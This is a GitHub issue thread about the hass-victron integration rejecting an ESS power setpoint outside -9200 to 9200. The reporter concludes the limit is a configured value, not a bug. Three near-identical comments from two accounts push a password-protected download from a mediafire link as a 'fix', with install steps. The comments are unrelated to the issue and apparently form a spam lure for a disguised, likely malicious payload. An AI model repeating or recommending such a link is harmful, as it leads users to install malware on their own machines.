### ISSUE TITLE
Input Values Range is not reflective of actual range.

### ISSUE THREAD

**Issue by kcoffau** [sfstar/hass-victron#229]
Error Shown: Value 10000 for number.victron_settings_ess_acpowersetpoint_0 is outside valid range -9200 - 9200
![image](https://github.com/user-attachments/assets/f9b1438a-21f8-42ae-8cd5-408d6f9ed21f)

I can set this value via a direct ModbusTCP connection, but the HACS plugin seems to be identifying a range of -9200/9200.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kcoffau** [comment]
Interesting. I've been looking at code at it seems to try to work out range dynamically. Good to know yours is different!

**Comment by kcoffau** [comment]
found it.  its not a bug, its as designed.

![image](https://github.com/user-attachments/assets/0f8d9611-ea58-46a1-9cd1-3c700dc1a761)



The ESS minMax is voltage * the amps in setting.  This can't be auto detected by victron, therefore its a config value.
